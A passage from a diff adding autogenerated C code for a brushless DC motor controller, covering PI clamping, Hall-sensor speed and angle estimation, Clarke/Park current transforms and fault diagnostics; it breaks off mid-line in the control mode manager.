+ + /* Update for UnitDelay: '/UnitDelay1' incorporates: + * DataTypeConversion: '/DataTypeConv4' + * Logic: '/AND1' + * Logic: '/AND1' + * RelationalOperator: '/Equal1' + */ + localDW->UnitDelay1_DSTATE = ((q0 == tmp_0) && (rtb_LowerRelop1_l || + rtb_UpperRelop_l)); + + /* Update for Delay: '/Resettable Delay' */ + localDW->icLoad = 0U; + localDW->ResettableDelay_DSTATE = rtb_Sum1_ni; +} + +/* System initialize for atomic system: '/PI_clamp_fixdt' */ +void PI_clamp_fixdt_f_Init(DW_PI_clamp_fixdt_g *localDW) +{ + /* InitializeConditions for Delay: '/Resettable Delay' */ + localDW->icLoad = 1U; +} + +/* System reset for atomic system: '/PI_clamp_fixdt' */ +void PI_clamp_fixdt_g_Reset(DW_PI_clamp_fixdt_g *localDW) +{ + /* InitializeConditions for UnitDelay: '/UnitDelay1' */ + localDW->UnitDelay1_DSTATE = false; + + /* InitializeConditions for Delay: '/Resettable Delay' */ + localDW->icLoad = 1U; +} + +/* Output and update for atomic system: '/PI_clamp_fixdt' */ +void PI_clamp_fixdt_k(int16_T rtu_err, uint16_T rtu_P, uint16_T rtu_I, int16_T + rtu_init, int16_T rtu_satMax, int16_T rtu_satMin, int32_T + rtu_ext_limProt, int16_T *rty_out, DW_PI_clamp_fixdt_g + *localDW) +{ + boolean_T rtb_LowerRelop1_i3; + boolean_T rtb_UpperRelop_i; + int16_T rtb_Sum1_bm; + int16_T tmp; + int32_T tmp_0; + int32_T q0; + + /* Sum: '/Sum2' incorporates: + * Product: '/Divide2' + */ + q0 = rtu_err * rtu_I; + if ((q0 < 0) && (rtu_ext_limProt < MIN_int32_T - q0)) { + q0 = MIN_int32_T; + } else if ((q0 > 0) && (rtu_ext_limProt > MAX_int32_T - q0)) { + q0 = MAX_int32_T; + } else { + q0 += rtu_ext_limProt; + } + + /* Delay: '/Resettable Delay' */ + if (localDW->icLoad != 0) { + localDW->ResettableDelay_DSTATE = rtu_init; + } + + /* Switch: '/Switch1' incorporates: + * Constant: '/Constant' + * Sum: '/Sum2' + * UnitDelay: '/UnitDelay1' + */ + if (localDW->UnitDelay1_DSTATE) { + tmp = 0; + } else { + tmp = (int16_T)(((q0 < 0 ? 65535 : 0) + q0) >> 16); + } + + /* End of Switch: '/Switch1' */ + + /* Sum: '/Sum1' incorporates: + * Delay: '/Resettable Delay' + */ + rtb_Sum1_bm = (int16_T)(tmp + localDW->ResettableDelay_DSTATE); + + /* Product: '/Divide5' */ + tmp_0 = (rtu_err * rtu_P) >> 11; + if (tmp_0 > 32767) { + tmp_0 = 32767; + } else { + if (tmp_0 < -32768) { + tmp_0 = -32768; + } + } + + /* Sum: '/Sum1' incorporates: + * Product: '/Divide5' + */ + tmp_0 = ((rtb_Sum1_bm << 1) + tmp_0) >> 1; + if (tmp_0 > 32767) { + tmp_0 = 32767; + } else { + if (tmp_0 < -32768) { + tmp_0 = -32768; + } + } + + /* RelationalOperator: '/LowerRelop1' incorporates: + * Sum: '/Sum1' + */ + rtb_LowerRelop1_i3 = ((int16_T)tmp_0 > rtu_satMax); + + /* RelationalOperator: '/UpperRelop' incorporates: + * Sum: '/Sum1' + */ + rtb_UpperRelop_i = ((int16_T)tmp_0 < rtu_satMin); + + /* Switch: '/Switch1' incorporates: + * Sum: '/Sum1' + * Switch: '/Switch3' + */ + if (rtb_LowerRelop1_i3) { + *rty_out = rtu_satMax; + } else if (rtb_UpperRelop_i) { + /* Switch: '/Switch3' */ + *rty_out = rtu_satMin; + } else { + *rty_out = (int16_T)tmp_0; + } + + /* End of Switch: '/Switch1' */ + + /* Signum: '/SignDeltaU2' incorporates: + * Sum: '/Sum2' + */ + if (q0 < 0) { + q0 = -1; + } else { + q0 = (q0 > 0); + } + + /* End of Signum: '/SignDeltaU2' */ + + /* Signum: '/SignDeltaU3' incorporates: + * Sum: '/Sum1' + */ + if ((int16_T)tmp_0 < 0) { + tmp = -1; + } else { + tmp = (int16_T)((int16_T)tmp_0 > 0); + } + + /* End of Signum: '/SignDeltaU3' */ + + /* Update for UnitDelay: '/UnitDelay1' incorporates: + * DataTypeConversion: '/DataTypeConv4' + * Logic: '/AND1' + * Logic: '/AND1' + * RelationalOperator: '/Equal1' + */ + localDW->UnitDelay1_DSTATE = ((q0 == tmp) && (rtb_LowerRelop1_i3 || + rtb_UpperRelop_i)); + + /* Update for Delay: '/Resettable Delay' */ + localDW->icLoad = 0U; + localDW->ResettableDelay_DSTATE = rtb_Sum1_bm; +} + +/* Model step function */ +void BLDC_controller_step(RT_MODEL *const rtM) +{ + P *rtP = ((P *) rtM->defaultParam); + DW *rtDW = ((DW *) rtM->dwork); + ExtU *rtU = (ExtU *) rtM->inputs; + ExtY *rtY = (ExtY *) rtM->outputs; + boolean_T rtb_LogicalOperator; + int8_T rtb_Sum2_h; + boolean_T rtb_RelationalOperator4_d; + boolean_T rtb_UnitDelay5_e; + uint8_T rtb_a_elecAngle_XA_g; + boolean_T rtb_LogicalOperator1_j; + boolean_T rtb_LogicalOperator2_p; + boolean_T rtb_RelationalOperator1_mv; + int16_T rtb_Switch1_l; + int16_T rtb_Saturation; + int16_T rtb_Saturation1; + int32_T rtb_Sum1_jt; + int16_T rtb_Merge_m; + int16_T rtb_Merge1; + uint16_T rtb_Divide14_e; + uint16_T rtb_Divide1_f; + int16_T rtb_TmpSignalConversionAtLow_Pa[2]; + int32_T rtb_Switch1; + int32_T rtb_Sum1; + int32_T rtb_Gain3; + uint8_T Sum; + int16_T Switch2; + int16_T Abs5; + int16_T DataTypeConversion2; + int16_T tmp[4]; + int8_T UnitDelay3; + + /* Outputs for Atomic SubSystem: '/BLDC_controller' */ + /* Sum: '/Sum' incorporates: + * Gain: '/g_Ha' + * Gain: '/g_Hb' + * Inport: '/b_hallA ' + * Inport: '/b_hallB' + * Inport: '/b_hallC' + */ + Sum = (uint8_T)((uint32_T)(uint8_T)((uint32_T)(uint8_T)(rtU->b_hallA << 2) + + (uint8_T)(rtU->b_hallB << 1)) + rtU->b_hallC); + + /* Logic: '/Logical Operator' incorporates: + * Inport: '/b_hallA ' + * Inport: '/b_hallB' + * Inport: '/b_hallC' + * UnitDelay: '/UnitDelay1' + * UnitDelay: '/UnitDelay2' + * UnitDelay: '/UnitDelay3' + */ + rtb_LogicalOperator = (boolean_T)((rtU->b_hallA != 0) ^ (rtU->b_hallB != 0) ^ + (rtU->b_hallC != 0) ^ (rtDW->UnitDelay3_DSTATE_fy != 0) ^ + (rtDW->UnitDelay1_DSTATE != 0)) ^ (rtDW->UnitDelay2_DSTATE_f != 0); + + /* If: '/If2' incorporates: + * If: '/If2' + * Inport: '/z_counterRawPrev' + * UnitDelay: '/UnitDelay3' + */ + if (rtb_LogicalOperator) { + /* Outputs for IfAction SubSystem: '/F01_03_Direction_Detection' incorporates: + * ActionPort: '/Action Port' + */ + /* UnitDelay: '/UnitDelay3' */ + UnitDelay3 = rtDW->Switch2_e; + + /* Sum: '/Sum2' incorporates: + * Constant: '/vec_hallToPos' + * Selector: '/Selector' + * UnitDelay: '/UnitDelay2' + */ + rtb_Sum2_h = (int8_T)(rtConstP.vec_hallToPos_Value[Sum] - + rtDW->UnitDelay2_DSTATE_b); + + /* Switch: '/Switch2' incorporates: + * Constant: '/Constant20' + * Constant: '/Constant23' + * Constant: '/Constant24' + * Constant: '/Constant8' + * Logic: '/Logical Operator3' + * RelationalOperator: '/Relational Operator1' + * RelationalOperator: '/Relational Operator6' + */ + if ((rtb_Sum2_h == 1) || (rtb_Sum2_h == -5)) { + rtDW->Switch2_e = 1; + } else { + rtDW->Switch2_e = -1; + } + + /* End of Switch: '/Switch2' */ + + /* Update for UnitDelay: '/UnitDelay2' incorporates: + * Constant: '/vec_hallToPos' + * Selector: '/Selector' + */ + rtDW->UnitDelay2_DSTATE_b = rtConstP.vec_hallToPos_Value[Sum]; + + /* End of Outputs for SubSystem: '/F01_03_Direction_Detection' */ + + /* Outputs for IfAction SubSystem: '/Raw_Motor_Speed_Estimation' incorporates: + * ActionPort: '/Action Port' + */ + rtDW->z_counterRawPrev = rtDW->UnitDelay3_DSTATE; + + /* Sum: '/Sum7' incorporates: + * Inport: '/z_counterRawPrev' + * UnitDelay: '/UnitDelay3' + * UnitDelay: '/UnitDelay4' + */ + Switch2 = (int16_T)(rtDW->z_counterRawPrev - rtDW->UnitDelay4_DSTATE); + + /* Abs: '/Abs2' */ + if (Switch2 < 0) { + rtb_Switch1_l = (int16_T)-Switch2; + } else { + rtb_Switch1_l = Switch2; + } + + /* End of Abs: '/Abs2' */ + + /* Relay: '/dz_cntTrnsDet' */ + if (rtb_Switch1_l >= rtP->dz_cntTrnsDetHi) { + rtDW->dz_cntTrnsDet_Mode = true; + } else { + if (rtb_Switch1_l <= rtP->dz_cntTrnsDetLo) { + rtDW->dz_cntTrnsDet_Mode = false; + } + } + + rtDW->dz_cntTrnsDet = rtDW->dz_cntTrnsDet_Mode; + + /* End of Relay: '/dz_cntTrnsDet' */ + + /* RelationalOperator: '/Relational Operator4' */ + rtb_RelationalOperator4_d = (rtDW->Switch2_e != UnitDelay3); + + /* Switch: '/Switch3' incorporates: + * Constant: '/Constant4' + * Logic: '/Logical Operator1' + * Switch: '/Switch1' + * Switch: '/Switch2' + * UnitDelay: '/UnitDelay1' + */ + if (rtb_RelationalOperator4_d && rtDW->UnitDelay1_DSTATE_n) { + rtb_Switch1_l = 0; + } else if (rtb_RelationalOperator4_d) { + /* Switch: '/Switch2' incorporates: + * UnitDelay: '/UnitDelay4' + */ + rtb_Switch1_l = rtDW->UnitDelay4_DSTATE_e; + } else if (rtDW->dz_cntTrnsDet) { + /* Switch: '/Switch1' incorporates: + * Constant: '/cf_speedCoef' + * Product: '/Divide14' + * Switch: '/Switch2' + */ + rtb_Switch1_l = (int16_T)((rtP->cf_speedCoef << 4) / + rtDW->z_counterRawPrev); + } else { + /* Switch: '/Switch1' incorporates: + * Constant: '/cf_speedCoef' + * Gain: '/g_Ha' + * Product: '/Divide13' + * Sum: '/Sum13' + * Switch: '/Switch2' + * UnitDelay: '/UnitDelay2' + * UnitDelay: '/UnitDelay3' + * UnitDelay: '/UnitDelay5' + */ + rtb_Switch1_l = (int16_T)(((uint16_T)(rtP->cf_speedCoef << 2) << 4) / + (int16_T)(((rtDW->UnitDelay2_DSTATE + rtDW->UnitDelay3_DSTATE_o) + + rtDW->UnitDelay5_DSTATE) + rtDW->z_counterRawPrev)); + } + + /* End of Switch: '/Switch3' */ + + /* Product: '/Divide11' */ + rtDW->Divide11 = (int16_T)(rtb_Switch1_l * rtDW->Switch2_e); + + /* Update for UnitDelay: '/UnitDelay4' */ + rtDW->UnitDelay4_DSTATE = rtDW->z_counterRawPrev; + + /* Update for UnitDelay: '/UnitDelay2' incorporates: + * UnitDelay: '/UnitDelay3' + */ + rtDW->UnitDelay2_DSTATE = rtDW->UnitDelay3_DSTATE_o; + + /* Update for UnitDelay: '/UnitDelay3' incorporates: + * UnitDelay: '/UnitDelay5' + */ + rtDW->UnitDelay3_DSTATE_o = rtDW->UnitDelay5_DSTATE; + + /* Update for UnitDelay: '/UnitDelay5' */ + rtDW->UnitDelay5_DSTATE = rtDW->z_counterRawPrev; + + /* Update for UnitDelay: '/UnitDelay1' */ + rtDW->UnitDelay1_DSTATE_n = rtb_RelationalOperator4_d; + + /* End of Outputs for SubSystem: '/Raw_Motor_Speed_Estimation' */ + } + + /* End of If: '/If2' */ + + /* Outputs for Atomic SubSystem: '/Counter' */ + + /* Constant: '/Constant6' incorporates: + * Constant: '/z_maxCntRst2' + */ + rtb_Switch1_l = (int16_T) Counter(1, rtP->z_maxCntRst, rtb_LogicalOperator, + &rtDW->Counter_e); + + /* End of Outputs for SubSystem: '/Counter' */ + + /* Switch: '/Switch2' incorporates: + * Constant: '/Constant4' + * Constant: '/z_maxCntRst' + * RelationalOperator: '/Relational Operator2' + */ + if (rtb_Switch1_l > rtP->z_maxCntRst) { + Switch2 = 0; + } else { + Switch2 = rtDW->Divide11; + } + + /* End of Switch: '/Switch2' */ + + /* Abs: '/Abs5' */ + if (Switch2 < 0) { + Abs5 = (int16_T)-Switch2; + } else { + Abs5 = Switch2; + } + + /* End of Abs: '/Abs5' */ + + /* Relay: '/n_commDeacv' */ + if (Abs5 >= rtP->n_commDeacvHi) { + rtDW->n_commDeacv_Mode = true; + } else { + if (Abs5 <= rtP->n_commAcvLo) { + rtDW->n_commDeacv_Mode = false; + } + } + + /* Logic: '/Logical Operator3' incorporates: + * Constant: '/b_angleMeasEna' + * Logic: '/Logical Operator1' + * Logic: '/Logical Operator2' + * Relay: '/n_commDeacv' + */ + rtb_LogicalOperator = (rtP->b_angleMeasEna || (rtDW->n_commDeacv_Mode && + (!rtDW->dz_cntTrnsDet))); + + /* UnitDelay: '/UnitDelay2' */ + rtb_RelationalOperator4_d = rtDW->UnitDelay2_DSTATE_c; + + /* UnitDelay: '/UnitDelay5' */ + rtb_UnitDelay5_e = rtDW->UnitDelay5_DSTATE_m; + + /* DataTypeConversion: '/Data Type Conversion2' incorporates: + * Inport: '/r_inpTgt' + */ + DataTypeConversion2 = (int16_T)(rtU->r_inpTgt << 4); + + /* Saturate: '/Saturation' incorporates: + * Inport: '/i_phaAB' + */ + rtb_Gain3 = rtU->i_phaAB << 4; + if (rtb_Gain3 >= 27200) { + rtb_Saturation = 27200; + } else if (rtb_Gain3 <= -27200) { + rtb_Saturation = -27200; + } else { + rtb_Saturation = (int16_T)(rtU->i_phaAB << 4); + } + + /* End of Saturate: '/Saturation' */ + + /* Saturate: '/Saturation1' incorporates: + * Inport: '/i_phaBC' + */ + rtb_Gain3 = rtU->i_phaBC << 4; + if (rtb_Gain3 >= 27200) { + rtb_Saturation1 = 27200; + } else if (rtb_Gain3 <= -27200) { + rtb_Saturation1 = -27200; + } else { + rtb_Saturation1 = (int16_T)(rtU->i_phaBC << 4); + } + + /* End of Saturate: '/Saturation1' */ + + /* If: '/If1' incorporates: + * Constant: '/b_angleMeasEna' + */ + if (!rtP->b_angleMeasEna) { + /* Outputs for IfAction SubSystem: '/F01_05_Electrical_Angle_Estimation' incorporates: + * ActionPort: '/Action Port' + */ + /* Switch: '/Switch2' incorporates: + * Constant: '/Constant16' + * Product: '/Divide1' + * Product: '/Divide3' + * RelationalOperator: '/Relational Operator7' + * Sum: '/Sum3' + * Switch: '/Switch3' + */ + if (rtb_LogicalOperator) { + /* MinMax: '/MinMax' */ + rtb_Merge_m = rtb_Switch1_l; + if (!(rtb_Merge_m < rtDW->z_counterRawPrev)) { + rtb_Merge_m = rtDW->z_counterRawPrev; + } + + /* End of MinMax: '/MinMax' */ + + /* Switch: '/Switch3' incorporates: + * Constant: '/vec_hallToPos' + * Constant: '/Constant16' + * RelationalOperator: '/Relational Operator7' + * Selector: '/Selector' + * Sum: '/Sum1' + */ + if (rtDW->Switch2_e == 1) { + rtb_Sum2_h = rtConstP.vec_hallToPos_Value[Sum]; + } else { + rtb_Sum2_h = (int8_T)(rtConstP.vec_hallToPos_Value[Sum] + 1); + } + + rtb_Merge_m = (int16_T)(((int16_T)((int16_T)((rtb_Merge_m << 14) / + rtDW->z_counterRawPrev) * rtDW->Switch2_e) + (rtb_Sum2_h << 14)) >> 2); + } else { + if (rtDW->Switch2_e == 1) { + /* Switch: '/Switch3' incorporates: + * Constant: '/vec_hallToPos' + * Selector: '/Selector' + */ + rtb_Sum2_h = rtConstP.vec_hallToPos_Value[Sum]; + } else { + /* Switch: '/Switch3' incorporates: + * Constant: '/vec_hallToPos' + * Selector: '/Selector' + * Sum: '/Sum1' + */ + rtb_Sum2_h = (int8_T)(rtConstP.vec_hallToPos_Value[Sum] + 1); + } + + rtb_Merge_m = (int16_T)(rtb_Sum2_h << 12); + } + + /* End of Switch: '/Switch2' */ + + /* MinMax: '/MinMax1' incorporates: + * Constant: '/Constant1' + */ + if (!(rtb_Merge_m > 0)) { + rtb_Merge_m = 0; + } + + /* End of MinMax: '/MinMax1' */ + + /* SignalConversion: '/Signal Conversion2' incorporates: + * Product: '/Divide2' + */ + rtb_Merge_m = (int16_T)((15 * rtb_Merge_m) >> 4); + + /* End of Outputs for SubSystem: '/F01_05_Electrical_Angle_Estimation' */ + } else { + /* Outputs for IfAction SubSystem: '/F01_06_Electrical_Angle_Measurement' incorporates: + * ActionPort: '/Action Port' + */ + /* Sum: '/Sum1' incorporates: + * Constant: '/Constant2' + * Constant: '/n_polePairs' + * Inport: '/a_mechAngle' + * Product: '/Divide' + */ + rtb_Sum1_jt = rtU->a_mechAngle * rtP->n_polePairs - 480; + + /* DataTypeConversion: '/Data Type Conversion20' incorporates: + * Constant: '/a_elecPeriod' + * Product: '/Divide2' + * Product: '/Divide3' + * Sum: '/Sum3' + */ + rtb_Merge_m = (int16_T)((int16_T)(rtb_Sum1_jt - ((int16_T)((int16_T) + div_nde_s32_floor(rtb_Sum1_jt, 5760) * 360) << 4)) << 2); + + /* End of Outputs for SubSystem: '/F01_06_Electrical_Angle_Measurement' */ + } + + /* End of If: '/If1' */ + + /* If: '/If1' incorporates: + * Constant: '/z_ctrlTypSel' + */ + rtb_Sum2_h = rtDW->If1_ActiveSubsystem; + UnitDelay3 = -1; + if (rtP->z_ctrlTypSel == 2) { + UnitDelay3 = 0; + } + + rtDW->If1_ActiveSubsystem = UnitDelay3; + if ((rtb_Sum2_h != UnitDelay3) && (rtb_Sum2_h == 0)) { + /* Disable for If: '/If2' */ + if (rtDW->If2_ActiveSubsystem_a == 0) { + /* Disable for Outport: '/iq' */ + rtDW->DataTypeConversion[0] = 0; + + /* Disable for Outport: '/iqAbs' */ + rtDW->Abs5_h = 0; + + /* Disable for Outport: '/id' */ + rtDW->DataTypeConversion[1] = 0; + } + + rtDW->If2_ActiveSubsystem_a = -1; + + /* End of Disable for If: '/If2' */ + + /* Disable for Outport: '/r_sin' */ + rtDW->r_sin_M1 = 0; + + /* Disable for Outport: '/r_cos' */ + rtDW->r_cos_M1 = 0; + + /* Disable for Outport: '/iq' */ + rtDW->DataTypeConversion[0] = 0; + + /* Disable for Outport: '/id' */ + rtDW->DataTypeConversion[1] = 0; + + /* Disable for Outport: '/iqAbs' */ + rtDW->Abs5_h = 0; + } + + if (UnitDelay3 == 0) { + /* Outputs for IfAction SubSystem: '/Clarke_Park_Transform_Forward' incorporates: + * ActionPort: '/Action Port' + */ + /* If: '/If1' incorporates: + * Constant: '/z_selPhaCurMeasABC' + */ + if (rtP->z_selPhaCurMeasABC == 0) { + /* Outputs for IfAction SubSystem: '/Clarke_PhasesAB' incorporates: + * ActionPort: '/Action Port' + */ + /* Gain: '/Gain4' */ + rtb_Gain3 = 18919 * rtb_Saturation; + + /* Gain: '/Gain2' */ + rtb_Sum1_jt = 18919 * rtb_Saturation1; + + /* Sum: '/Sum1' incorporates: + * Gain: '/Gain2' + * Gain: '/Gain4' + */ + rtb_Gain3 = (((rtb_Gain3 < 0 ? 32767 : 0) + rtb_Gain3) >> 15) + (int16_T) + (((rtb_Sum1_jt < 0 ? 16383 : 0) + rtb_Sum1_jt) >> 14); + if (rtb_Gain3 > 32767) { + rtb_Gain3 = 32767; + } else { + if (rtb_Gain3 < -32768) { + rtb_Gain3 = -32768; + } + } + + rtb_Merge1 = (int16_T)rtb_Gain3; + + /* End of Sum: '/Sum1' */ + /* End of Outputs for SubSystem: '/Clarke_PhasesAB' */ + } else if (rtP->z_selPhaCurMeasABC == 1) { + /* Outputs for IfAction SubSystem: '/Clarke_PhasesBC' incorporates: + * ActionPort: '/Action Port' + */ + /* Sum: '/Sum3' */ + rtb_Gain3 = rtb_Saturation - rtb_Saturation1; + if (rtb_Gain3 > 32767) { + rtb_Gain3 = 32767; + } else { + if (rtb_Gain3 < -32768) { + rtb_Gain3 = -32768; + } + } + + /* Gain: '/Gain2' incorporates: + * Sum: '/Sum3' + */ + rtb_Gain3 *= 18919; + rtb_Merge1 = (int16_T)(((rtb_Gain3 < 0 ? 32767 : 0) + rtb_Gain3) >> 15); + + /* Sum: '/Sum1' */ + rtb_Gain3 = -rtb_Saturation - rtb_Saturation1; + if (rtb_Gain3 > 32767) { + rtb_Gain3 = 32767; + } else { + if (rtb_Gain3 < -32768) { + rtb_Gain3 = -32768; + } + } + + rtb_Saturation = (int16_T)rtb_Gain3; + + /* End of Sum: '/Sum1' */ + /* End of Outputs for SubSystem: '/Clarke_PhasesBC' */ + } else { + /* Outputs for IfAction SubSystem: '/Clarke_PhasesAC' incorporates: + * ActionPort: '/Action Port' + */ + /* Gain: '/Gain4' */ + rtb_Gain3 = 18919 * rtb_Saturation; + + /* Gain: '/Gain2' */ + rtb_Sum1_jt = 18919 * rtb_Saturation1; + + /* Sum: '/Sum1' incorporates: + * Gain: '/Gain2' + * Gain: '/Gain4' + */ + rtb_Gain3 = -(((rtb_Gain3 < 0 ? 32767 : 0) + rtb_Gain3) >> 15) - (int16_T) + (((rtb_Sum1_jt < 0 ? 16383 : 0) + rtb_Sum1_jt) >> 14); + if (rtb_Gain3 > 32767) { + rtb_Gain3 = 32767; + } else { + if (rtb_Gain3 < -32768) { + rtb_Gain3 = -32768; + } + } + + rtb_Merge1 = (int16_T)rtb_Gain3; + + /* End of Sum: '/Sum1' */ + /* End of Outputs for SubSystem: '/Clarke_PhasesAC' */ + } + + /* End of If: '/If1' */ + + /* PreLookup: '/a_elecAngle_XA' */ + rtb_a_elecAngle_XA_g = plook_u8s16_evencka(rtb_Merge_m, 0, 128U, 180U); + + /* Interpolation_n-D: '/r_sin_M1' */ + rtDW->r_sin_M1 = rtConstP.r_sin_M1_Table[rtb_a_elecAngle_XA_g]; + + /* Interpolation_n-D: '/r_cos_M1' */ + rtDW->r_cos_M1 = rtConstP.r_cos_M1_Table[rtb_a_elecAngle_XA_g]; + + /* If: '/If2' incorporates: + * Constant: '/cf_currFilt' + * Inport: '/b_motEna' + */ + rtb_Sum2_h = rtDW->If2_ActiveSubsystem_a; + UnitDelay3 = -1; + if (rtU->b_motEna) { + UnitDelay3 = 0; + } + + rtDW->If2_ActiveSubsystem_a = UnitDelay3; + if ((rtb_Sum2_h != UnitDelay3) && (rtb_Sum2_h == 0)) { + /* Disable for Outport: '/iq' */ + rtDW->DataTypeConversion[0] = 0; + + /* Disable for Outport: '/iqAbs' */ + rtDW->Abs5_h = 0; + + /* Disable for Outport: '/id' */ + rtDW->DataTypeConversion[1] = 0; + } + + if (UnitDelay3 == 0) { + if (0 != rtb_Sum2_h) { + /* SystemReset for IfAction SubSystem: '/Current_Filtering' incorporates: + * ActionPort: '/Action Port' + */ + + /* SystemReset for Atomic SubSystem: '/Low_Pass_Filter' */ + + /* SystemReset for If: '/If2' */ + Low_Pass_Filter_Reset(&rtDW->Low_Pass_Filter_m); + + /* End of SystemReset for SubSystem: '/Low_Pass_Filter' */ + + /* End of SystemReset for SubSystem: '/Current_Filtering' */ + } + + /* Sum: '/Sum6' incorporates: + * Product: '/Divide1' + * Product: '/Divide4' + */ + rtb_Gain3 = (int16_T)((rtb_Merge1 * rtDW->r_cos_M1) >> 14) - (int16_T) + ((rtb_Saturation * rtDW->r_sin_M1) >> 14); + if (rtb_Gain3 > 32767) { + rtb_Gain3 = 32767; + } else { + if (rtb_Gain3 < -32768) { + rtb_Gain3 = -32768; + } + } + + /* Outputs for IfAction SubSystem: '/Current_Filtering' incorporates: + * ActionPort: '/Action Port' + */ + /* SignalConversion: '/TmpSignal ConversionAtLow_Pass_FilterInport1' incorporates: + * Sum: '/Sum6' + */ + rtb_TmpSignalConversionAtLow_Pa[0] = (int16_T)rtb_Gain3; + + /* End of Outputs for SubSystem: '/Current_Filtering' */ + + /* Sum: '/Sum1' incorporates: + * Product: '/Divide2' + * Product: '/Divide3' + */ + rtb_Gain3 = (int16_T)((rtb_Saturation * rtDW->r_cos_M1) >> 14) + (int16_T) + ((rtb_Merge1 * rtDW->r_sin_M1) >> 14); + if (rtb_Gain3 > 32767) { + rtb_Gain3 = 32767; + } else { + if (rtb_Gain3 < -32768) { + rtb_Gain3 = -32768; + } + } + + /* Outputs for IfAction SubSystem: '/Current_Filtering' incorporates: + * ActionPort: '/Action Port' + */ + /* SignalConversion: '/TmpSignal ConversionAtLow_Pass_FilterInport1' incorporates: + * Sum: '/Sum1' + */ + rtb_TmpSignalConversionAtLow_Pa[1] = (int16_T)rtb_Gain3; + + /* Outputs for Atomic SubSystem: '/Low_Pass_Filter' */ + Low_Pass_Filter(rtb_TmpSignalConversionAtLow_Pa, rtP->cf_currFilt, + rtDW->DataTypeConversion, &rtDW->Low_Pass_Filter_m); + + /* End of Outputs for SubSystem: '/Low_Pass_Filter' */ + + /* Abs: '/Abs5' incorporates: + * Constant: '/cf_currFilt' + */ + if (rtDW->DataTypeConversion[0] < 0) { + rtDW->Abs5_h = (int16_T)-rtDW->DataTypeConversion[0]; + } else { + rtDW->Abs5_h = rtDW->DataTypeConversion[0]; + } + + /* End of Abs: '/Abs5' */ + /* End of Outputs for SubSystem: '/Current_Filtering' */ + } + + /* End of If: '/If2' */ + /* End of Outputs for SubSystem: '/Clarke_Park_Transform_Forward' */ + } + + /* End of If: '/If1' */ + + /* Chart: '/Task_Scheduler' incorporates: + * UnitDelay: '/UnitDelay2' + * UnitDelay: '/UnitDelay5' + * UnitDelay: '/UnitDelay6' + */ + if (rtDW->UnitDelay2_DSTATE_c) { + /* Outputs for Function Call SubSystem: '/F02_Diagnostics' */ + /* If: '/If2' incorporates: + * Constant: '/CTRL_COMM2' + * Constant: '/t_errDequal' + * Constant: '/t_errQual' + * Constant: '/b_diagEna' + * RelationalOperator: '/Relational Operator2' + */ + if (rtP->b_diagEna) { + /* Outputs for IfAction SubSystem: '/Diagnostics_Enabled' incorporates: + * ActionPort: '/Action Port' + */ + /* Switch: '/Switch3' incorporates: + * Abs: '/Abs4' + * Constant: '/n_stdStillDet' + * Constant: '/CTRL_COMM4' + * Constant: '/r_errInpTgtThres' + * Inport: '/b_motEna' + * Logic: '/Logical Operator1' + * RelationalOperator: '/Relational Operator9' + * RelationalOperator: '/Relational Operator7' + * S-Function (sfix_bitop): '/Bitwise Operator1' + * UnitDelay: '/UnitDelay' + * UnitDelay: '/UnitDelay4' + */ + if ((rtDW->UnitDelay_DSTATE_e & 4) != 0) { + rtb_RelationalOperator1_mv = true; + } else { + if (rtDW->UnitDelay4_DSTATE_eu < 0) { + /* Abs: '/Abs4' incorporates: + * UnitDelay: '/UnitDelay4' + */ + rtb_Saturation1 = (int16_T)-rtDW->UnitDelay4_DSTATE_eu; + } else { + /* Abs: '/Abs4' incorporates: + * UnitDelay: '/UnitDelay4' + */ + rtb_Saturation1 = rtDW->UnitDelay4_DSTATE_eu; + } + + rtb_RelationalOperator1_mv = (rtU->b_motEna && (Abs5 < + rtP->n_stdStillDet) && (rtb_Saturation1 > rtP->r_errInpTgtThres)); + } + + /* End of Switch: '/Switch3' */ + + /* Sum: '/Sum' incorporates: + * Constant: '/CTRL_COMM' + * Constant: '/CTRL_COMM1' + * DataTypeConversion: '/Data Type Conversion3' + * Gain: '/g_Hb' + * Gain: '/g_Hb1' + * RelationalOperator: '/Relational Operator1' + * RelationalOperator: '/Relational Operator3' + */ + rtb_a_elecAngle_XA_g = (uint8_T)(((uint32_T)((Sum == 7) << 1) + (Sum == 0)) + + (rtb_RelationalOperator1_mv << 2)); + + /* Outputs for Atomic SubSystem: '/Debounce_Filter' */ + Debounce_Filter(rtb_a_elecAngle_XA_g != 0, rtP->t_errQual, + rtP->t_errDequal, &rtDW->Merge_p, &rtDW->Debounce_Filter_k); + + /* End of Outputs for SubSystem: '/Debounce_Filter' */ + + /* Outputs for Atomic SubSystem: '/either_edge' */ + either_edge(rtDW->Merge_p, &rtb_RelationalOperator1_mv, + &rtDW->either_edge_i); + + /* End of Outputs for SubSystem: '/either_edge' */ + + /* Switch: '/Switch1' incorporates: + * Constant: '/CTRL_COMM2' + * Constant: '/t_errDequal' + * Constant: '/t_errQual' + * RelationalOperator: '/Relational Operator2' + */ + if (rtb_RelationalOperator1_mv) { + /* Outport: '/z_errCode' */ + rtY->z_errCode = rtb_a_elecAngle_XA_g; + } else { + /* Outport: '/z_errCode' incorporates: + * UnitDelay: '/UnitDelay' + */ + rtY->z_errCode = rtDW->UnitDelay_DSTATE_e; + } + + /* End of Switch: '/Switch1' */ + + /* Update for UnitDelay: '/UnitDelay' incorporates: + * Outport: '/z_errCode' + */ + rtDW->UnitDelay_DSTATE_e = rtY->z_errCode; + + /* End of Outputs for SubSystem: '/Diagnostics_Enabled' */ + } + + /* End of If: '/If2' */ + /* End of Outputs for SubSystem: '/F02_Diagnostics' */ + + /* Outputs for Function Call SubSystem: '/F03_Control_Mode_Manager' */ + /* Logic: '/Logical Operator4' incorporates: + * Constant: '/constant8' + * Inport: '/b_motEna' + * Inport: '/z_ctrlModReq' + * Logic: '/Logical Operator7' + * RelationalOperator: '/Relational Operator10' + */ + rtb_RelationalOperator1_mv = (rtDW->Merge_p || (!rtU->b_motEna) || + (rtU->z_ctrlModReq == 0)); + + /* Logic: '/Logical Operator1' incorporates: + * Constant: '/b_cruiseCtrlEna' + * Constant: '/constant1' + * Inport: '/z_ctrlModReq' + * RelationalOperator: '/Relational Operator1' + */ + rtb_LogicalOperator1_j = ((rtU->z_ctrlModReq == 2) || rtP->b_cruiseCtrlEna); + + /* Logic: '/Logical Operator2' incorporates: + * Constant: '/b_cruiseCtrlEna' + * Constant: '/constant' + * Inport: '/z_ctrlModReq' + * Logic: '/Logical Operator5' + * RelationalOperator: '/Relational Operator4' + */ + rtb_LogicalOperator2_p = ((rtU->z_ctrlModReq == 3) && (!rtP->b_cruiseCtrlEna)); + + /* Chart: '/F03_02_Control_Mode_Manager' incorporates: + * Constant: 